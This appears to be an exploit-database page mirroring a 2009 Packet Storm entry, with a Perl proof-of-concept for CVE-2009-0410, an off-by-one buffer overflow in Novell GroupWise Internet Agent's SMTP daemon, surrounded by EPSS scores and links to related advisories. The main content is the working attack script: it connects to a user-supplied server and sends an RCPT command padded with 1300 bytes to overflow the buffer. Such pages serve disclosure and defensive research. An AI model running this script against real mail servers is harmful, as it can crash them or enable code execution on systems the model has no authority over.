Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
packetstormPraveen DarshanamPACKETSTORM:74653
HistoryFeb 04, 2009 - 12:00 a.m.

Novell GroupWise 8.0 RCPT Off-By-One Exploit

2009-02-0400:00:00
Praveen Darshanam
packetstormsecurity.com
19

0.933 High

EPSS

Percentile

99.1%

JSON
`#!usr/bin/perl -w  
  
#######################################################################################  
###############################QUICK AND DIRTY EXPLOIT#################################  
#######################################################################################  
# Off-by-one error in the SMTP daemon in GroupWise Internet Agent (GWIA)  
# in Novell GroupWise 6.5x, 7.0, 7.01, 7.02, 7.03, 7.03HP1a, and 8.0 allows  
# remote attackers to execute arbitrary code via a long e-mail address in a  
# malformed RCPT command, leading to a buffer overflow.  
# Refer:  
# http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2009-0410  
#  
# To run this exploit on MS Windows replace "#!usr/bin/perl -w" with  
# "#!Installation_path_for_perl -w" (say #!C:/Program Files/Perl/bin/perl -w)  
#  
#$$$$$This was strictly written for educational purpose. Use it at your own risk.$$$$$  
#$$$$$Author will not bare any responsibility for any damages watsoever.$$$$$$$$$$$$$$  
#  
# Author: Praveen Darshanam  
# Email: praveen[underscore]recker[at]sify.com\  
# Blog: http://www.darshanams.blogspot.com/  
# Date: 04th February, 2009  
#  
########Thanx to str0ke, milw0rm, @rp m@n, an all the security folks####################  
########################################################################################  
  
  
use Net::SMTP;  
print "***SMTP module is working fine***\n";  
  
  
$buff="D" x 1300;  
print "Enter Vulnerable Novell GroupWise SMTP Server Domain Name\n";  
$smtp_vuln_server_name=<STDIN>;  
chop($smtp_vuln_server_name);  
  
$smtp_attack=Net::SMTP->new("$smtp_vuln_server_name");  
print"\nEnter your/from mail ID here\n";  
$$mail_from=<STDIN>;  
chop($mail_from);  
  
  
print"\nEnter Recepient mail ID\n";  
$to_mail_id=<STDIN>;  
chop($to_mail_id);  
  
$mal_buffer=$buff.$to_mail_id;  
  
$smtp_attack->mail($mail_from);  
$smtp_attack->to($mal_buffer);  
  
$smtp_attack->data();  
$smtp_attack->datasend("Attacking...");  
  
$smtp_attack->quit();  
  
`

Related

exploitpack 1
checkpoint_advisories 2
zdi 1
cve 1
cvelist 1
seebug 2
prion 1
nvd 1
exploitdb 1
exploitpack
exploitpack
Novell Groupwise 8.0 - RCPT Off-by-One
2009-02-04 00:00:00
checkpoint_advisories
checkpoint_advisories
Preemptive Protection against Novell Groupwise Internet Agent RCPT Command Buffer Overflow
2009-01-26 00:00:00
Novell Groupwise Internet Agent RCPT Command Buffer Overflow (CVE-2009-0410)
2009-11-18 00:00:00
zdi
zdi
Novell Netware Groupwise GWIA RCPT Command Buffer Overflow Vulnerability
2009-02-02 00:00:00
cve
cve
CVE-2009-0410
2009-02-03 19:30:00
cvelist
cvelist
CVE-2009-0410
2009-02-03 19:00:00
seebug
seebug
Novell GroupWise <= 8.0 Malformed RCPT command Off-by-one Exploit
2014-07-01 00:00:00
Novell GroupWise &lt;= 8.0 Malformed RCPT command Off-by-one Exploit
2009-02-04 00:00:00
prion
prion
Buffer overflow
2009-02-03 19:30:00
nvd
nvd
CVE-2009-0410
2009-02-03 19:30:00
exploitdb
exploitdb
Novell Groupwise 8.0 - &#039;RCPT&#039; Off-by-One
2009-02-04 00:00:00

0.933 High

EPSS

Percentile

99.1%

JSON
Related for PACKETSTORM:74653
exploitpack1checkpoint_advisories2zdi1cve1cvelist1seebug2prion1nvd1exploitdb1